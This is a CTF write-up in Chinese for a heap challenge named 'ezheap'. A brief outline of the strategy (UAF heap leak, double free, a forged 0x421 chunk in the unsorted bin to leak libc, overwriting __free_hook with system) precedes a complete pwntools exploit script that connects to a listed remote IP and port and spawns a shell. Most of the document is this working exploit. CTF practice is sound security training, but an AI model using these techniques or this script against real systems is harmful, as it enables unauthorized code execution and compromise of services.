ezheap
由于只能分配0x50大小的chunk,并且只有一次UAF,可以先利用UAF泄露heap地址,然后构造double_free。利用这个double_free分配到一个伪造的0x421大小的chunk,释放这个chunk,就能直接进入到Unsortedbin中,然后填充一下字符,泄露出libc。
之后重新构造一个double_free劫持free_hook即可
EXP
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102
| from pwn import * from pwn import p64,p32,u64,u32 from ctypes import * from libcfind import * from LibcSearcher import * import base64 import sys context(os='linux', arch='amd64', log_level='debug') context.terminal = ["tmux", "splitw", "-h"] debug = 1 if debug: p = process('./pwn') elf = ELF('./pwn') else: p = remote('47.93.143.29', 34774) elf = ELF('./pwn')
s = lambda data: p.send(data) sa = lambda text, data: p.sendafter(text, data) sl = lambda data: p.sendline(data) sla = lambda text, data: p.sendlineafter(text, data) r = lambda num=4096: p.recv(num) rl = lambda text: p.recvuntil(text) pr = lambda num=4096: sys.stdout.write(p.recv(num).decode()) inter = lambda: p.interactive() l32 = lambda: u32(p.recvuntil(b'\xf7')[-4:].ljust(4, b'\x00')) l64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) uu32 = lambda: u32(p.recv(4).ljust(4, b'\x00')) uu64 = lambda: u64(p.recv(6).ljust(8, b'\x00')) int16 = lambda data: int(data, 16) lg = lambda s, num: p.success('%s -> 0x%x' % (s, num))
libc = ELF('./libc.so.6') def add(content): sl('1') pause() s(content) def delete(index): sl('2') r() sl(str(index)) def show(index): sl('3') r() sl(str(index)) def uaf(index): s(str(0x202405)) pause() sl(str(index))
gdb.attach(p) for i in range(13): add(p64(0)*3+p64(0x61)) for i in range(6,-1,-1): delete(i)
delete(8) uaf(7)
show(7) heap_leak = uu64() lg("heap_leak",heap_leak) heap_base = heap_leak-0x590 lg("heap_base",heap_base)
delete(9) delete(7) for i in range(7): add(p64(0)*3+p64(0x421)) add(p64(heap_base+0x2c0)) add(p64(0)*3+p64(0x421)) add(p64(0)*3+p64(0x421)) add('aaa') delete(13) add('bbbbbbbb') show(13) rl('bbbbbbbb') libc_leak = uu64() lg("libc_leak",libc_leak) libc_base = libc_leak-0x3f0-0x1ecbe0 lg("libc_base",libc_base) free_hook = libc_base+libc.sym['__free_hook'] system = libc_base + libc.sym['system']
for i in range(7): delete(i)
delete(7) delete(8) delete(9) for i in range(7): add('aa') add(p64(free_hook)) add(b'/bin/sh\x00') add(b'/bin/sh\x00') add(p64(system)) delete(7)
inter()
|